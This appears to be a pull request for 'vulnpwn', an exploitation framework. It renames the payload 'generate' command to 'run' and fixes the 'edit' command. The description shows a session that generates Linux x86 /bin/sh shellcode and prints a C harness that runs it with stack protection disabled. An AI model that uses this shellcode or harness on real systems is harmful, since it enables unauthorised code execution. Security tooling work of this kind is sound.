### PR TITLE
rename generate to run / fix edit command

### DIFF
--- a/lib/base/base.py
+++ b/lib/base/base.py
@@ -100,7 +100,9 @@ class Base(framework.Framework):
 
     def do_edit(self, line):
         """Edit the current module with $VISUAL or $EDITOR"""
-        self.editfile(sys.argv[0])
+        filename = self.__module__.replace('.', self.path_sep)
+        filename = ''.join([self.app_path, self.path_sep, filename, '.py'])
+        self.editfile(filename)
 
     def do_use(self, line):
         """Load framework module"""

--- a/lib/core/payload.py
+++ b/lib/core/payload.py
@@ -16,13 +16,6 @@ class Payload(module.Module):
     def generate_shellcode(self):
         pass
 
-    def do_generate(self, line):
+    def do_run(self, line):
         '''generate a payload shellcode'''
         self.generate_shellcode()
-
-    def help_generate():
-        self.output('')
-        self.output('  Usage :  generate')
-        self.output('  Desp  :  %s' % getattr(self, 'do_generate').__doc__)
-        self.output('  Demo  :  generate')
-        self.output('')


### PR DESCRIPTION
If you want to view the current module source, just run **`edit`** command:


```
vulnpwn (payloads/linux/x86/bin_sh) > run
[*] ----Hex shellcode----
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80


[*] ----C   shellcode----
Compile: gcc -fno-stack-protector -z execstack shellcode.c

#include <stdio.h>
#include <string.h>

char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(void){
     fprintf(stdout,"Length: %d\n",strlen(shellcode));
     (*(void(*)()) shellcode)();
}
```

----

```
vulnpwn [core_framework] ./vulnpwn

/$$    /$$           /$$
| $$   | $$          | $$
| $$   | $$ /$$   /$$| $$ /$$$$$$$   /$$$$$$  /$$  /$$  /$$ /$$$$$$$
|  $$ / $$/| $$  | $$| $$| $$__  $$ /$$__  $$| $$ | $$ | $$| $$__  $$
 \  $$ $$/ | $$  | $$| $$| $$  \ $$| $$  \ $$| $$ | $$ | $$| $$  \ $$
  \  $$$/  | $$  | $$| $$| $$  | $$| $$  | $$| $$ | $$ | $$| $$  | $$
   \  $/   |  $$$$$$/| $$| $$  | $$| $$$$$$$/|  $$$$$/$$$$/| $$  | $$
    \_/     \______/ |__/|__/  |__/| $$____/  \_____/\___/ |__/  |__/
                                   | $$
                                   | $$
                                   |__/



       =[ vulnpwn v1.00                      ]=
+ -- --=[ get more about security !          ]=-- -- +


vulnpwn > use payloads/linux/x86/bin_sh
[!] Please set module 'options'
vulnpwn (payloads/linux/x86/bin_sh) > edit
[*] EDIT FILE > /Users/Open-Security/Code/vulnpwn/modules/payloads/linux/x86/bin_sh.py
``` 